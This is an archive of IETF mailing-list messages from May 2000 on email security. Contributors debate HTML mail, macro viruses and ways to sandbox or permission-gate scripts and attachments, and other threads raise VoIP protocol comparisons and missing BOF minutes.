> 6. A program wants to send a file to somewhere. Or any permanently stored
> information (like cookie but not limited).
Yes:
Browser operators may not want to send their files, recordings,
pictures, video, or other device inputs to arbitrary sites without
their explicit permission and direction. Therefore, browser
authors are encouraged to disallow the submission of forms
which include any kind of file upload by any means other than the
standard HTML operator-controlled buttons for form submission
without explicit instruction from the session operator to the
contrary. Accordingly, the size attribute, style sheets, and
document layers should be prevented from obscuring any kind
of file upload widget if they are capable of accepting a default
filename. Furthermore, just as the operator may take direct
action to initiate, terminate, review and edit recordings ... browser
authors are encouraged to prevent HTML scripts from taking those and
similar actions, unless for example the operator has specifically
enabled such script actions with a security option. Even then,
such preferences may be specified by the operator to reset after
an interval or at the end of the browsing session. Finally, explicit
information should be provided by the browser to the operator to
insure that the operator is fully informed when files are being uploaded.
Cheers,
James
>From owner-ietf-outbound Thu May 11 20:50:24 2000
Received: by ietf.org (8.9.1a/8.9.1a) id UAA11667
for [EMAIL PROTECTED]; Thu, 11 May 2000 20:50:02 -0400 (EDT)
Received: from calcite.rhyolite.com (calcite.rhyolite.com [38.159.140.3])
by ietf.org (8.9.1a/8.9.1a) with ESMTP id UAA11629
for <[EMAIL PROTECTED]>; Thu, 11 May 2000 20:48:37 -0400 (EDT)
Received: (from vjs@localhost)
by calcite.rhyolite.com (8.9.3/calcite) id SAA04447
for [EMAIL PROTECTED] env-from <vjs>;
Thu, 11 May 2000 18:48:37 -0600 (MDT)
Date: Thu, 11 May 2000 18:48:37 -0600 (MDT)
From: Vernon Schryver <[EMAIL PROTECTED]>
Message-Id: <[EMAIL PROTECTED]>
To: [EMAIL PROTECTED]
Subject: Re: VIRUS WARNING
X-Loop: [EMAIL PROTECTED]
> From: John Stracke <[EMAIL PROTECTED]>
> --------------95872F20B70C837D61220742
> Content-Type: text/plain; charset=us-ascii
> Content-Transfer-Encoding: 7bit
>
> Vernon Schryver wrote:
>
> > What good is HTML based email if it cannot run
> > scripts or even contain links to other HTML content?
>
> Well, there's basic formatting:
>
> * Simple font variations (italics, bold, color, font) are an easy way to add
> a bit of expressiveness to your text.
> o Everybody says that the problem with email is that it's not expressive
> enough.
> o To compensate, we've got an elaborate set of conventions for imitating
> what you can do in print and face-to-face (smileys, *asterisks* for
> emphasis, etc.).
> o But new users don't know these conventions.
> o HTML offers the ability to do the same thing more comprehensibly.
> Actual smiley faces, italics for emphasis (just like people are used
> to seeing in print), headings.
> * And, of course, lists and tables are amazingly useful.
All of that can be done in pure ASCII.
You don't have to be Shakespear to communicate with the written word
without more punctuation than existed in 1960. There was no global plague
in 1970 that damage all English speaking brains so that they could no
longer communicate without 256 colors of foreground and background, and
1000 typefaces. "Smileys" are particularly lame. No joke is made funny
with a smiley nor is any insult prevented.
The conventions of bullet lists such as rendered by <LI> are also mere
conventions as opaque to the uninitiated as astrisks or capitalization
for emphasis. Most of use are bright enough to not need any explicit
initiation to any reasonable convention; even smileys were obvious when
there was only 1 kind.
> And even simple links (never mind forms, applets, etc.) are great for, say,
> workflow applications. When I worked for Netscape, HR made great use of HTML
> mail in the internal network. When I wanted to take some vacation
> time, I filled out a form on the HR site; they would send mail to my manager,
> with one link to approve and one to deny. Much easier than paper-based systems,
> or even non-email-based online systems (since the vacation request comes into
> the inbox you already check, instead of making you go someplace else).
Email is not a general purpose hammer. All of those things work
far better with various other mechanisms than crammed into email.
Email can be a useful part of such systems, but competently designed
systems DO NOT do such things purely in email.
Worse, when crammed into email, those mechanisms are *INEVITABLE*
serious security problems. Email is not only for communications
among intimates, such as you and your Human Resources Department.
If you let your MUA fully decode HTML every time you read a message, then
you are in deep trouble. It's not just the Java and Javascript. Do you
really want to tell strangers every time you look at their email because
it contains an <HREF> to a unique URL created just for the purpose?
> ...
> --------------95872F20B70C837D61220742
> Content-Type: text/html; charset=us-ascii
> Content-Transfer-Encoding: 7bit
>
> <!doctype html public "-//w3c//dtd html 4.0 transitional//en">
> <html>
> Vernon Schryver wrote:
> <blockquote TYPE=CITE>What good is HTML based email if it cannot run
> <br>scripts or even contain links to other HTML content?</blockquote>
> Well, there's basic formatting:
> <ul>
> <li>
> Simple font variations (italics, bold, color, font) are an easy way to
> add a bit of expressiveness to your text.</li>
> <ul>
> <li>
> ...
If the point in including an HTML encrypted version of the text in addition
to the plantext was to demonstrate the utility of HTML in email, it fell
flat. The HTML version conveyed *nothing* to me that the plaintext did
not. And yes, I checked by viewing the HTML with Netscape 4.7.
> ...
> <pre>--
> /===============================================================\
> |John Stracke | <A
>HREF="http://www.ecal.com">http://www.ecal.com</A> |My opinions are my own. |
> |Chief Scientist |==============================================|
> |eCal Corp. |Whose cruel idea was it for the word
>"lisp" to|
> |[EMAIL PROTECTED]|have an "S" in
>it?
> |
> \===============================================================/</pre>
> </html>
That's what your signature looks like encrypted with HTML.
(I'm hoping my archaic quote leading will keep too-smart-by-half MUA's
from collapsing it into reasonableness)
Who could prefer it to the plaintext version?
> /===============================================================\
> |John Stracke | http://www.ecal.com |My opinions are my own. |
> |Chief Scientist |==============================================|
> |eCal Corp. |Whose cruel idea was it for the word "lisp" to|
> |[EMAIL PROTECTED]|have an "S" in it? |
> \===============================================================/
Vernon Schryver [EMAIL PROTECTED]
>From owner-ietf-outbound Thu May 11 21:00:17 2000
Received: by ietf.org (8.9.1a/8.9.1a) id VAA11842
for [EMAIL PROTECTED]; Thu, 11 May 2000 21:00:02 -0400 (EDT)
Received: from dfw7-1.relay.mail.uu.net (dfw7-1.relay.mail.uu.net [199.171.54.106])
by ietf.org (8.9.1a/8.9.1a) with ESMTP id UAA11764
for <[EMAIL PROTECTED]>; Thu, 11 May 2000 20:53:24 -0400 (EDT)
Received: from exchange2.idxii.net by dfw7sosrv11.alter.net with ESMTP
(peer crosschecked as: exchange2.idxii.net [206.64.6.16])
id QQioud12783;
Fri, 12 May 2000 00:53:22 GMT
Received: by exchange2.idxii.net with Internet Mail Service (5.5.2448.0)
id <2HC3S5ZX>; Thu, 11 May 2000 20:40:16 -0400
Message-ID: <[EMAIL PROTECTED]>
From: Hubert Chang <[EMAIL PROTECTED]>
To: "'Yixin Zhu '" <[EMAIL PROTECTED]>, "'[EMAIL PROTECTED] '" <[EMAIL PROTECTED]>
Subject: RE: Any comparison Study on MGCP vs H.323, MGCP vs SIP
Date: Thu, 11 May 2000 20:40:13 -0400
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2448.0)
Content-Type: text/plain;
charset="iso-8859-1"
X-Loop: [EMAIL PROTECTED]
Yes, I need this comparison too, please help.
Hubert Chang
-----Original Message-----
From: Yixin Zhu
To: [EMAIL PROTECTED]
Sent: 5/11/00 10:55 AM
Subject: Any comparison Study on MGCP vs H.323, MGCP vs SIP
Hi,
There are studies on the comparision of the two competing protocol SIP
and
H.323. However, MGCP can also provide call control functionalities. A
network with MGCP only (Call agent, MG etc) can provide basic VoIP
service
too. Then my questions are
1. Are there any comparison study between MGCP and H.323?
2. Are there any comparision study between MGCP and SIP?
You help is very much appreciated. Thanks,
Yixin (James) ZHU
>From owner-ietf-outbound Thu May 11 22:10:28 2000
Received: by ietf.org (8.9.1a/8.9.1a) id WAA13446
for [EMAIL PROTECTED]; Thu, 11 May 2000 22:10:02 -0400 (EDT)
Received: from alcove.wittsend.com (IDENT:[EMAIL PROTECTED] [130.205.0.28])
by ietf.org (8.9.1a/8.9.1a) with ESMTP id WAA13376
for <[EMAIL PROTECTED]>; Thu, 11 May 2000 22:04:00 -0400 (EDT)
Received: (from mhw@localhost)
by alcove.wittsend.com (8.9.3/8.9.3) id VAA20813;
Thu, 11 May 2000 21:03:39 -0400
Date: Thu, 11 May 2000 21:03:39 -0400
From: "Michael H. Warfield" <[EMAIL PROTECTED]>
To: Vernon Schryver <[EMAIL PROTECTED]>
Cc: [EMAIL PROTECTED]
Subject: Re: VIRUS WARNING
Message-ID: <[EMAIL PROTECTED]>
References: <[EMAIL PROTECTED]>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
User-Agent: Mutt/1.1.5i
In-Reply-To: <[EMAIL PROTECTED]>; from
[EMAIL PROTECTED] on Thu, May 11, 2000 at 06:48:37PM -0600
X-Loop: [EMAIL PROTECTED]
On Thu, May 11, 2000 at 06:48:37PM -0600, Vernon Schryver wrote:
[...]
> All of that can be done in pure ASCII.
> You don't have to be Shakespear to communicate with the written word
> without more punctuation than existed in 1960. There was no global plague
> in 1970 that damage all English speaking brains so that they could no
> longer communicate without 256 colors of foreground and background, and
> 1000 typefaces. "Smileys" are particularly lame. No joke is made funny
> with a smiley nor is any insult prevented.
Actually... On the point of smilies, I will give you an argument
and that argument is that you've missed the real point. We are in a
multicultural environment here. Some participants do not speak English
as their first language or maybe not even as their second. Many, even
amongst the English based, don't understand each other idionyms and slang
terms. How many know that the term "sheeetload" is a Southern US American
metric measure of volume? :-) Communications goes above and beyond
simple words.
In f2f communications, they say that the majority of communications
is non-verbal. Body language, intonation, expressions, all play a part.
Smilies are an, abet lame, attempt to add some of that non-verbal language
back into written communications. It helps convey the point of humor to
those who do might not recognize it. It helps convey sarcasm and refine
remarks to direct them along the lines which they are meant. I've used
numerous remarks that could be taken seriously, humorously, figuratively,
or literally and the thing that stands between communication and
missunderstanding are those darn smilies to convey the underlying meaning.
This is especially important when you can't even be sure what country
or culture you are communicating with.
I will say that HTML is IMHO worthless and inappropriate in
E-Mail. Similies, OTOH, are much like the universal symbol signs we
see up every. Their purpose is to convey meaning even when the language
is not [fully] understood. And language, in this case, means one hell
of a lot more than one word strung after another. :-/
> The conventions of bullet lists such as rendered by <LI> are also mere
> conventions as opaque to the uninitiated as astrisks or capitalization
> for emphasis. Most of use are bright enough to not need any explicit
> initiation to any reasonable convention; even smileys were obvious when
> there was only 1 kind.
[...]
> Email is not a general purpose hammer. All of those things work
> far better with various other mechanisms than crammed into email.
> Email can be a useful part of such systems, but competently designed
> systems DO NOT do such things purely in email.
Could not agree more.
> Worse, when crammed into email, those mechanisms are *INEVITABLE*
> serious security problems. Email is not only for communications
> among intimates, such as you and your Human Resources Department.
> If you let your MUA fully decode HTML every time you read a message, then
> you are in deep trouble. It's not just the Java and Javascript. Do you
> really want to tell strangers every time you look at their email because
> it contains an <HREF> to a unique URL created just for the purpose?
[...]
> Vernon Schryver [EMAIL PROTECTED]
Mike
--
Michael H. Warfield | (770) 985-6132 | [EMAIL PROTECTED]
(The Mad Wizard) | (770) 331-2437 | http://www.wittsend.com/mhw/
NIC whois: MHW9 | An optimist believes we live in the best of all
PGP Key: 0xDF1DD471 | possible worlds. A pessimist is sure of it!
>From owner-ietf-outbound Fri May 12 01:50:20 2000
Received: by ietf.org (8.9.1a/8.9.1a) id BAA21773
for [EMAIL PROTECTED]; Fri, 12 May 2000 01:50:02 -0400 (EDT)
Received: from dokka.maxware.no (dokka.maxware.no [195.139.236.69])
by ietf.org (8.9.1a/8.9.1a) with ESMTP id BAA21749
for <[EMAIL PROTECTED]>; Fri, 12 May 2000 01:49:33 -0400 (EDT)
Received: from langfjella.Alvestrand.no ([10.128.167.143])
by dokka.maxware.no (8.9.3/8.9.3) with ESMTP id HAA14366;
Fri, 12 May 2000 07:49:25 +0200
Message-Id: <[EMAIL PROTECTED]>
X-Sender: [EMAIL PROTECTED]
X-Mailer: QUALCOMM Windows Eudora Version 4.3.1
Date: Fri, 12 May 2000 00:12:46 +0200
To: "James P. Salsman" <[EMAIL PROTECTED]>, [EMAIL PROTECTED]
From: Harald Tveit Alvestrand <[EMAIL PROTECTED]>
Subject: Re: mail sandbox wall authority, inward and outbound
In-Reply-To: <[EMAIL PROTECTED]>
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"; format=flowed
X-Loop: [EMAIL PROTECTED]
At 13:10 11.05.2000 -0700, James P. Salsman wrote:
>These sorts of things are less common on the more heterogeneous
>Unix world, but Unix mailers are just as culpable. If I wanted to
>be consistent, I would demand that anything I run on Unix (without
>a special permitted shell) which connects to port 25 should be
>intercepted, wrapped with an "ok queued" SMTP response, and
>forwarded to me instead. Would anyone argue that isn't reasonable?
Yes, but only because I have 15 different programs that more or less
indirectly invoke /usr/sbin/sendmail for various reasons.
Most of them are tools invoked from cron.
In a fine-grained capabilities control system, I'd have the "send email" as
one access control descriptor I could grant these programs.
But that's not been implemented in any widespread system I know of.
Harald
--
Harald Tveit Alvestrand, EDB Maxware, Norway
[EMAIL PROTECTED]
>From owner-ietf-outbound Fri May 12 03:20:21 2000
Received: by ietf.org (8.9.1a/8.9.1a) id DAA28913
for [EMAIL PROTECTED]; Fri, 12 May 2000 03:20:02 -0400 (EDT)
Received: from bells.cs.ucl.ac.uk (bells.cs.ucl.ac.uk [128.16.5.31])
by ietf.org (8.9.1a/8.9.1a) with SMTP id DAA28879
for <[EMAIL PROTECTED]>; Fri, 12 May 2000 03:17:40 -0400 (EDT)
Received: from sonic.cs.ucl.ac.uk by bells.cs.ucl.ac.uk with local SMTP
id <[EMAIL PROTECTED]>; Fri, 12 May 2000 08:17:33 +0100
To: Leonid Yegoshin <[EMAIL PROTECTED]>
cc: [EMAIL PROTECTED], [EMAIL PROTECTED]
Subject: Re: mail sandbox wall authority, inward and outbound
In-reply-to: Your message of "Thu, 11 May 2000 15:38:34 PDT."
<[EMAIL PROTECTED]>
Date: Fri, 12 May 2000 08:17:31 +0100
Message-ID: <[EMAIL PROTECTED]>
From: Jon Crowcroft <[EMAIL PROTECTED]>
X-Loop: [EMAIL PROTECTED]
the problem with sandboxes is that they are monolithic as is this
discussion of mail - if i have a notion of a compartmentalized system
with users, and access rights (like almost all operating systems from the
late 60s onwards, but not like
simple desk top single user executives as found on many personal
computers today unfortuantely),
then i can have mail agents run scripts, but with the authorities of
the user, perhaps restricted further by some context, and i can then
configure arbitrary rights w.r.t each possible tool that the script
might invoke - some of these can be gathered togethre under the
headings of "file input, output, exectution, creation etc", and others
under the rights of "audio/video/mouse/itneraction with user",
"network i/o to such and such an address (list)", etc
for conveneicnce and expressiveness in the ACL system (other
management tools like user, other, groups etc help scale the task)
and then i can design a set of sensible securioty policies for a site,
and employ an expert to configure things for everyone - typically,
with good systems, defaults and default operating system notions of
user, file permissions, sudo type access etc, will suffice...
iff you start with a decent system;
otherwise, forget it - someone will always find a way to set things up
disastrously wrong, because it will be the only way to get work done
....this is a standad problem with systems that impose all or nothing
security - either they leak like a sive or users find them
unusable...
so the solution is to ditch indecent systems.
In message <[EMAIL PROTECTED]>, Leonid Yegoshin typed
:
>>>From: "James P. Salsman" <[EMAIL PROTECTED]>
>>>
>>>A MUA might ask the console operator for permission to proceed when:
>>>
>>>1. A mail message wants to run a program. (e.g., ECMAscripts.)
>>>
>>>2. An attachment is executable. (Nearly universal practice.)
>>>
>>>3. A program wants to write to a file. (Usually not trapped more
>>>than once per execution if at all.)
>>>
>>>4. A program wants to read your address book. (Does any mail system
>>>that offers this functionality limit it at all?)
>>>
>>>5. A program wants to send mail. (e.g., having MAPI's Send notify
>>>the user and queue the proposed message as a draft instead of sending.)
>>>
>> 6. A program wants to send a file to somewhere. Or any permanently stored
>> information (like cookie but not limited).
>>
>> - Leonid Yegoshin.
>>
cheers
jon
>From owner-ietf-outbound Fri May 12 04:10:20 2000
Received: by ietf.org (8.9.1a/8.9.1a) id EAA29324
for [EMAIL PROTECTED]; Fri, 12 May 2000 04:10:02 -0400 (EDT)
Received: from anise.tte.vtt.fi (anise.tte.vtt.fi [130.188.52.29])
by ietf.org (8.9.1a/8.9.1a) with ESMTP id EAA29297
for <[EMAIL PROTECTED]>; Fri, 12 May 2000 04:08:40 -0400 (EDT)
Received: (from msa@localhost)
by anise.tte.vtt.fi (8.8.5/8.8.5) id LAA32110;
Fri, 12 May 2000 11:08:34 +0300 (EET DST)
Date: Fri, 12 May 2000 11:08:34 +0300 (EET DST)
From: Markku Savela <[EMAIL PROTECTED]>
Message-Id: <[EMAIL PROTECTED]>
To: [EMAIL PROTECTED]
CC: [EMAIL PROTECTED], [EMAIL PROTECTED], [EMAIL PROTECTED]
In-reply-to: <[EMAIL PROTECTED]> (message from Jon Crowcroft on Fri, 12 May
2000 08:17:31 +0100)
Subject: Re: mail sandbox wall authority, inward and outbound
Reply-to: [EMAIL PROTECTED] (Markku Savela)
X-Loop: [EMAIL PROTECTED]
> under the rights of "audio/video/mouse/itneraction with user",
> "network i/o to such and such an address (list)", etc for
> conveneicnce and expressiveness in the ACL system (other management
> tools like user, other, groups etc help scale the task) and then i
> can design a set of sensible securioty policies for a site,
I think we should "turn around the view" (maybe you were saying this
in another way).
That is, instead of ACL type protection, where a resource is
associated with a list of allowed users and uses, we should have a
list of allowed resources and uses attaced to each program
(exectutable or active object).
And by default, a program could not access any resources at all.
In case of mail attachment containing an executable, we could quite
safely try to run it, and the system would just inform that it tries
to open this or that file (do you want to allow it?), trying to
open TCP connection to port 25 (do you want to allow it?), or tries to
execute another program (do you want to allow it?).
To make such thing work, program installation packages would need to
be accompanied with a "resource usage list", which could be checked by
the user, and if acceptable, and then associated with the program.
I don't see it causing much overhead. For example, linux program
loader could be changed to load the usage list, and on open file, it
is not a big issue in scanning this list whether the access is allowed
or not. Most programs really need access to few files and resources
anyway (and naturally, there would be ways to give access to wide
range of resources, if needed -- the old group/owner uids would be
still available for that purpose)
--
Markku Savela ([EMAIL PROTECTED]), Technical Research Centre of Finland
Multimedia Systems, P.O.Box 1203,FIN-02044 VTT,http://www.vtt.fi/tte/staff/msa/
>From owner-ietf-outbound Fri May 12 08:51:26 2000
Received: by ietf.org (8.9.1a/8.9.1a) id IAA01323
for [EMAIL PROTECTED]; Fri, 12 May 2000 08:50:02 -0400 (EDT)
Received: from ftpbox.mot.com (ftpbox.mot.com [129.188.136.101])
by ietf.org (8.9.1a/8.9.1a) with ESMTP id IAA01236
for <[EMAIL PROTECTED]>; Fri, 12 May 2000 08:43:57 -0400 (EDT)
Received: [from pobox.mot.com (pobox.mot.com [129.188.137.100]) by ftpbox.mot.com
(ftpbox 2.1) with ESMTP id FAA16824 for <[EMAIL PROTECTED]>; Fri, 12 May 2000 05:43:57
-0700 (MST)]
Received: [from m-zuk02-r1.mot.com (m-zuk02-r1.mot.com [140.101.234.21]) by
pobox.mot.com (MOT-pobox 2.0) with ESMTP id FAA28586 for <[EMAIL PROTECTED]>; Fri, 12 May
2000 05:43:56 -0700 (MST)]
Received: from [140.101.173.9] by m-zuk02-r1.mot.com with ESMTP for [EMAIL PROTECTED];
Fri, 12 May 2000 05:43:43 -0700
Received: (from root@localhost)
by zorglub.crm.mot.com (8.8.8/8.8.8/crm-1.6) id OAA28309
for [EMAIL PROTECTED]; Fri, 12 May 2000 14:43:43 +0200 (METDST)
Received: from crm.mot.com (cedric.crm.mot.com [140.101.173.77])
by zorglub.crm.mot.com (8.8.8/8.8.8/crm-1.6) with ESMTP id OAA28280
for <[EMAIL PROTECTED]>; Fri, 12 May 2000 14:43:42 +0200 (METDST)
Message-Id: <[EMAIL PROTECTED]>
Date: Fri, 12 May 2000 14:43:40 +0200
From: Christophe Janneteau <[EMAIL PROTECTED]>
Reply-To: Christophe Janneteau-ACJ006 <[EMAIL PROTECTED]>
Organization: Centre de Recherche de Motorola - Paris
X-Mailer: Mozilla 4.5 [en] (WinNT; I)
X-Accept-Language: en
MIME-Version: 1.0
To: [EMAIL PROTECTED]
Subject: Spatial IP bof?
Content-Type: multipart/mixed;
boundary="------------C8E8625BBD45F9941DD55B5A"
X-Loop: [EMAIL PROTECTED]
This is a multi-part message in MIME format.
--------------C8E8625BBD45F9941DD55B5A
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Hi,
Does someone has any information about the Spatial IP bof. Is it going
to become a WG?
The minute is not available on the IETF web site:
http://www2.ietf.org/proceedings/00mar/unedit/spatial-bof-00mar.txt is
the minute for SIP323 bof !
Where can I get this minute?
Thanks,
Christophe.
--------------C8E8625BBD45F9941DD55B5A
Content-Type: text/x-vcard; charset=us-ascii;
name="Christophe.Janneteau.vcf"
Content-Description: Card for Christophe Janneteau
Content-Disposition: attachment;
filename="Christophe.Janneteau.vcf"
Content-Transfer-Encoding: 7bit
begin:vcard
n:Janneteau;Christophe
tel;fax:+33 1 69 35 25 01
tel;work:+33 1 69 35 25 00
x-mozilla-html:FALSE
org:MOTOROLA
version:2.1
email;internet:[EMAIL PROTECTED]
adr;quoted-printable:;;Centre de Recherche de Motorola - Paris=0D=0AEspace
technologique - St Aubin=0D=0A;Gif sur Yvette;;91193;France
fn:Christophe Janneteau
end:vcard
--------------C8E8625BBD45F9941DD55B5A--
>From owner-ietf-outbound Fri May 12 09:00:17 2000
Received: by ietf.org (8.9.1a/8.9.1a) id JAA01446
for [EMAIL PROTECTED]; Fri, 12 May 2000 09:00:03 -0400 (EDT)
Received: from hudutil3gw.ml.com (hudutil3f01.ml.com [198.242.49.33])
by ietf.org (8.9.1a/8.9.1a) with ESMTP id IAA01243
for <[EMAIL PROTECTED]>; Fri, 12 May 2000 08:44:53 -0400 (EDT)
Received: from ehudwt01.exchange.ml.com (ehudwt01.exchange.ml.com [199.201.37.22])
by hudutil3gw.ml.com (8.9.3/8.9.3/MLgwo-4.03) with SMTP id IAA14801;
Fri, 12 May 2000 08:44:48 -0400 (EDT)
Received: from 172.20.64.1 by ehudwt01.exchange.ml.com with ESMTP (
WorldSecure Server SMTP Relay(WSS) v4.5); Fri, 12 May 2000 08:44:47
-0400
X-Server-Uuid: 3789b954-9c4e-11d3-af68-0008c73b0911
Received: by epcc01.na2.us.ml.com with Internet Mail Service (
5.5.2650.21) id <KXMJP9XK>; Fri, 12 May 2000 08:44:46 -0400
Message-ID: <[EMAIL PROTECTED]>
From: "Castro, Edison M. (PCA)" <[EMAIL PROTECTED]>
To: "'Doug Sauder'" <[EMAIL PROTECTED]>,
"Castro, Edison M. (PCA)" <[EMAIL PROTECTED]>, [EMAIL PROTECTED]
Subject: RE: VIRUS WARNING
Date: Fri, 12 May 2000 08:44:42 -0400
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2650.21)
X-WSS-ID: 1505233528594-01-01
Content-Type: text/plain;
charset=iso-8859-1
Content-Transfer-Encoding: 7bit
Content-Transfer-Encoding: 7bit
X-Loop: [EMAIL PROTECTED]
Content-Transfer-Encoding: 7bit
Let's see if this reasoning holds water. Imagine your favorite OS, suppose
that I send you
a .pl file (Perl Script). You then make the "mistake" of saving it to the
file system and then
proceed to running the script. What do you think that script can do?. What
will you have to do
to fix your problem?. This is completely analogous to changing the default
selection on the
"Do you want to run this document's macros" dialog from "NO" to "YES".
We have become a society of excuses people, nothing is our fault. It is
always somebody
else's fault.
WE HAVE TO TAKE RESPONSIBILITY FOR OUR OWN ACTIONS!!!!!!!!!!!!
ps: if I made this stupid mistake, I will immediately check what macros are
included in the
forsaken document and delete them.
-----Original Message-----
From: Doug Sauder [mailto:[EMAIL PROTECTED]]
Sent: Thursday, May 11, 2000 5:55 PM
To: Castro, Edison M. (PCA); [EMAIL PROTECTED]
Subject: RE: VIRUS WARNING
> -----Original Message-----
> From: Castro, Edison M. (PCA) [mailto:[EMAIL PROTECTED]]
> That is exactly the same way that all Windows virus work. As a Windows
> user (as well as other OSes), I can say that people have to be
> responsible
> for their actions. Whenever you receive any Email attachment,
> the only way
> that attachment can produce any damage is if you run it.
>
> At least in my copy of MS Word anytime I open a word document and it
> contains
> any macros, Word readily ask me if I want to allow the macro to execute.
> Not only that, this version of Word (2000) is configured to only
> ask me when
> a signed (with a certificate of a trusted party) macro is included.
Suppose you made the mistake of opening a Word document with a VBA (Visual
Basic for Applications) script virus. (I did this once and I am sharing a
real-life experience.) The VBA script turns off the option that disables
automatically running scripts. I kid you not! Next time you open a Word
document that contains a script, you won't be asked whether you want to run
it. If you go into the options settings and set the option to disable
running scripts, you have done nothing, because the virus script runs when
you close the document and turns the option back off again.
At least not allowing macros to disable the don't-run-macros option seems
reasonable to me, but it seemed to have escaped the engineers who created
Microsoft Word.
Doug Sauder
Software Engineer
Broadsoft, Inc
>From owner-ietf-outbound Fri May 12 09:10:17 2000
Received: by ietf.org (8.9.1a/8.9.1a) id JAA01637
for [EMAIL PROTECTED]; Fri, 12 May 2000 09:10:02 -0400 (EDT)
Received: from prue.eim.surrey.ac.uk (IDENT:[EMAIL PROTECTED] [131.227.76.5])
by ietf.org (8.9.1a/8.9.1a) with ESMTP id IAA01347
for <[EMAIL PROTECTED]>; Fri, 12 May 2000 08:53:29 -0400 (EDT)
Received: from petra.ee.surrey.ac.uk ([131.227.88.13] ident=eep1lw)
by prue.eim.surrey.ac.uk with esmtp (Exim 3.03 #1)
id 12qEwF-0001DT-00; Fri, 12 May 2000 13:53:07 +0100
Date: Fri, 12 May 2000 13:53:05 +0100 (BST)
From: Lloyd Wood <[EMAIL PROTECTED]>
X-Sender: [EMAIL PROTECTED]
Reply-To: [EMAIL PROTECTED]
To: Vernon Schryver <[EMAIL PROTECTED]>
cc: [EMAIL PROTECTED]
Subject: Re: VIRUS WARNING
In-Reply-To: <[EMAIL PROTECTED]>
Message-ID: <[EMAIL PROTECTED]>
Organization: speaking for none
X-url: http://www.ee.surrey.ac.uk/Personal/L.Wood/
X-no-archive: yes
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
X-Loop: [EMAIL PROTECTED]
On Thu, 11 May 2000, Vernon Schryver wrote:
> All of that can be done in pure ASCII.
> You don't have to be Shakespear to communicate with the written word
> without more punctuation than existed in 1960. There was no global plague
> in 1970 that damage all English speaking brains so that they could no
> longer communicate without 256 colors of foreground and background, and
> 1000 typefaces.
It came earlier than that. It was called "television".
L.
can't stand sentences whose grammart doesn't follow Boole.
<[EMAIL PROTECTED]>PGP<http://www.ee.surrey.ac.uk/Personal/L.Wood/>
>From owner-ietf-outbound Fri May 12 09:40:17 2000
Received: by ietf.org (8.9.1a/8.9.1a) id JAA02233
for [EMAIL PROTECTED]; Fri, 12 May 2000 09:40:02 -0400 (EDT)
Received: from broadsoft.com (broadsoft.com [161.58.239.68])
by ietf.org (8.9.1a/8.9.1a) with ESMTP id JAA02088
for <[EMAIL PROTECTED]>; Fri, 12 May 2000 09:35:12 -0400 (EDT)
Received: from raymond ([216.181.56.35]) by broadsoft.com (8.8.8) id JAA95536; Fri, 12
May 2000 09:35:12 -0400 (EDT)
From: "Doug Sauder" <[EMAIL PROTECTED]>
To: "Castro, Edison M. (PCA)" <[EMAIL PROTECTED]>, <[EMAIL PROTECTED]>
Subject: RE: VIRUS WARNING
Date: Fri, 12 May 2000 09:43:46 -0400
Message-ID: <[EMAIL PROTECTED]>
MIME-Version: 1.0
Content-Type: text/plain;
charset="iso-8859-1"
X-Priority: 3 (Normal)
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2910.0)
In-Reply-To: <[EMAIL PROTECTED]>
Importance: Normal
X-MimeOLE: Produced By Microsoft MimeOLE V5.00.2314.1300
Content-Transfer-Encoding: 8bit
X-MIME-Autoconverted: from quoted-printable to 8bit by ietf.org id JAA02088
X-Loop: [EMAIL PROTECTED]
Content-Transfer-Encoding: 8bit
Oh, I agree that we have to take responsibility for our own actions. I am absolutely
responsible for allowing the macro to run.
After I mistakenly ran the macro, my first thought was to neutralize it -- to stop it
from spreading further -- by disabling the automatic running of macros.
Unfortunately, Word paid more attention to what the macro wanted, than what *I* the
user wanted. I said "DON'T RUN MACROS!!". The macro said "run macros." Guess who
Word listened to? Do you see the catch? It's not a matter of not being responsible.
I take the blame. But MS made it much easier for the virus to get the upper hand.
The don't-run-macros option is only halfway useful if you can only turn it off, but
can never turn it on again.
At that time I knew very little about macros. The VBA editor seemed non-intuitive to
use. I tried to remove the virus by deleting the VBA script, and that took several
hours of research in MS Word How-To books. I finally ended up going out to a store
and buying the virus clean-up software.
--
Doug Sauder
Software Engineer
Broadsoft, Inc
> -----Original Message-----
> From: Castro, Edison M. (PCA) [mailto:[EMAIL PROTECTED]]
> Sent: Friday, May 12, 2000 08:45
> To: 'Doug Sauder'; Castro, Edison M. (PCA); [EMAIL PROTECTED]
> Subject: RE: VIRUS WARNING
>
>
> Let's see if this reasoning holds water. Imagine your favorite OS, suppose
> that I send you
> a .pl file (Perl Script). You then make the "mistake" of saving it to the
> file system and then
> proceed to running the script. What do you think that script can do?. What
> will you have to do
> to fix your problem?. This is completely analogous to changing the default
> selection on the
> "Do you want to run this document's macros" dialog from "NO" to "YES".
>
> We have become a society of excuses people, nothing is our fault. It is
> always somebody
> else's fault.
>
> WE HAVE TO TAKE RESPONSIBILITY FOR OUR OWN ACTIONS!!!!!!!!!!!!
>
>
> ps: if I made this stupid mistake, I will immediately check what
> macros are
> included in the
> forsaken document and delete them.
>
>
> -----Original Message-----
> From: Doug Sauder [mailto:[EMAIL PROTECTED]]
> Sent: Thursday, May 11, 2000 5:55 PM
> To: Castro, Edison M. (PCA); [EMAIL PROTECTED]
> Subject: RE: VIRUS WARNING
>
>
>
>
> > -----Original Message-----
> > From: Castro, Edison M. (PCA) [mailto:[EMAIL PROTECTED]]
> > That is exactly the same way that all Windows virus work. As a Windows
> > user (as well as other OSes), I can say that people have to be
> > responsible
> > for their actions. Whenever you receive any Email attachment,
> > the only way
> > that attachment can produce any damage is if you run it.
> >
> > At least in my copy of MS Word anytime I open a word document and it
> > contains
> > any macros, Word readily ask me if I want to allow the macro to
> execute.
> > Not only that, this version of Word (2000) is configured to only
> > ask me when
> > a signed (with a certificate of a trusted party) macro is included.
>
> Suppose you made the mistake of opening a Word document with a VBA (Visual
> Basic for Applications) script virus. (I did this once and I am sharing a
> real-life experience.) The VBA script turns off the option that disables
> automatically running scripts. I kid you not! Next time you open a Word
> document that contains a script, you won't be asked whether you
> want to run
> it. If you go into the options settings and set the option to disable
